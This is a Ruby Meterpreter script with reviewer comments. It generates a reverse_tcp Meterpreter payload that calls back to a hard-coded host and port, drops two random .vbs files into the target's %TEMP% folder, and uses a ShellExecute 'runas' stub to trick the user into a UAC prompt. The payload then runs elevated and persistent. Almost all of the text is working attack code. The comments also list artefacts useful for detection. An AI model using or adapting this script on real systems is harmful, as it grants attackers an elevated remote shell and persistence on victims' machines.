# $Id: killuac.rb spudgunman $
#
# Meterpreter script to prompt for permissions to run in elevated mode and then call home
# some code pulled from the persistence.rb script
# Script by Kelly Keeton
# Version: 0.5
#
# What the script does, as visible below:
#   1. builds a reverse_tcp payload from the hard-coded defaults and wraps it in VBScript,
#   2. writes two randomly named .vbs files into the session's %TEMP% directory,
#   3. runs the first one with wscript.exe; that script re-launches itself through
#      ShellExecute with the "runas" verb (an interactive UAC consent prompt) and, once
#      elevated, starts the second (payload) script with wscript.exe.
# Observable artefacts are therefore: two .vbs files in %TEMP%, a visible UAC prompt,
# and a wscript.exe -> wscript.exe (elevated) -> wscript.exe process chain.
#
# Default parameters
#
rhost = "192.168.254.129"
rport = 31337
payload = "windows/meterpreter/reverse_tcp"
##
# %TEMP% is expanded on the remote session, not on the operator's machine.
tempdir = client.fs.file.expand_path("%TEMP%")
# rand(8)+6 gives a name of 6..13 random letters; this path is also embedded in the
# elevation script below.
payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
platform = client.platform.scan(/(win32|win64)/)
# NOTE(review): String#scan always returns an Array (possibly empty), and an Array is
# truthy in Ruby, so `not platform` is never true and `unsupported` is never reached here.
unsupported if not platform
print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
# Interpolating `payload` into a new string is equivalent to passing `payload` directly.
pay = client.framework.payloads.create("#{payload}")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
# Wraps the raw payload in a VBScript launcher; the meaning of :persist/:delay is
# defined by Msf::Util::EXE.to_win32pe_vbs, not shown here (presumably a re-run loop
# with a 5 second delay -- confirm against that helper).
payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
print_status("Payload script is #{payloadvbs.length} bytes long")

# Elevation stub. With no arguments it re-executes itself (WScript.FullName +
# ScriptFullName) via Shell.Application.ShellExecute with the "runas" verb and the
# argument "noloop"; the Else branch runs when that argument is present, i.e. after the
# user has answered the UAC prompt, and it launches the payload script with wscript.
# strPath/objFile/strFolder are computed in the Else branch but never used.
uacvbs = "
If WScript.Arguments.length =0 Then
Set objShell = CreateObject(\"Shell.Application\")
objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
Else
Set objShell = WScript.CreateObject(\"WScript.Shell\")
Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
strPath = Wscript.ScriptFullName
Set objFile = objFSO.GetFile(strPath)
strFolder = objFSO.GetParentFolderName(objFile)
tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
objShell.Run(tmp)
End If"
#
# Upload to the filesystem
#
# Second random .vbs name in the same %TEMP% directory, for the elevation stub.
elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
print_status("UAC elevation script written to #{elevationfile}")
# Both writes go through the Meterpreter file API; the handles are closed explicitly
# rather than with a block/ensure, so a failed write leaves the handle open.
fd = client.fs.file.new(elevationfile, "wb")
fd.write(uacvbs)
fd.close
print_status("payload script written to #{payloadfile}")
fd = client.fs.file.new(payloadfile, "wb")
fd.write(payloadvbs)
fd.close
#
# Execute the script
#
# 'Hidden' => false: the process is started visibly, and the "runas" re-launch inside it
# depends on the interactive user accepting the UAC consent dialog.
proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
print_status("Script executed with PID #{proc.pid}")
#EOF